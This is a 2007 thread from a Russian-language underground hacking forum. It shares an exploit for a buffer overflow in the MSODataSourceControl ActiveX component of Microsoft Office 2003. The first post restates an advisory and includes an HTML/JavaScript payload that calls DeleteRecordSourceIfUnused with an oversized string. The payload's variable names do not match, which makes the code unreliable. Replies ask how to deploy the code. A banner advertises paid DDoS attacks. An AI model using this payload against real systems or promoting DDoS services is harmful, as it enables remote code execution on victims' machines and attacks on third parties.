Перейти к содержимому

 Друзья: Всё для вебмастера | [ Реклама на форуме ]


Rutor
Rutor


[ DDos Услуги. DDos атака. Заказать ДДос ]


Переполнение буфера в M$ Office

Автор aka PSIH , 17 Jun 2007 03:30

  • Авторизуйтесь для ответа в теме
Сообщений в теме: 2

#1
aka PSIH
Отправлено 17 June 2007 - 03:30

aka PSIH

    ~~~

  • Extended
  • PipPip
  • 238 сообщений
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за ошибки в функции DeleteRecordSourceIfUnused() в MSODataSourceControl ActiveX компоненте. Удаленный пользователь может с помощью специально сформированного Web страницы вызвать переполнение буфера и выполнить произвольный код на целевой системе.

провенно тока на Office 2003

exp(html):

Цитата

<html>  
<object id=ctl classid="clsid:{0002E55B-0000-0000-C000-000000000046}">
</object>
<script language="javascript">
var b = 'AAAA';  while (b.length <= 256) b+=b;  ctl.DeleteRecordSourceIfUnused(B);  
</script>
</html>


©securitylab.ru
Everything that was made by human is possible to crack => ideal protection does not exist
*********
icq:162295
*********

#2
Versus
Отправлено 20 May 2009 - 17:37

Versus

    Бит

  • Members
  • 23 сообщений
А куда помещать сам код? Не могли бы Вы пояснить?

#3
Pernat1y
Отправлено 22 May 2009 - 06:16

Pernat1y

    Байт

  • Members
  • Pip
  • 146 сообщений
русским языком написано:

Цитата

с помощью специально сформированного Web страницы

зы. дату темы вообще видел?
Обратно в Уязвимости и Сплойты

Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных

  1. ProLogic.Su
  2. Underground
  3. Уязвимости и Сплойты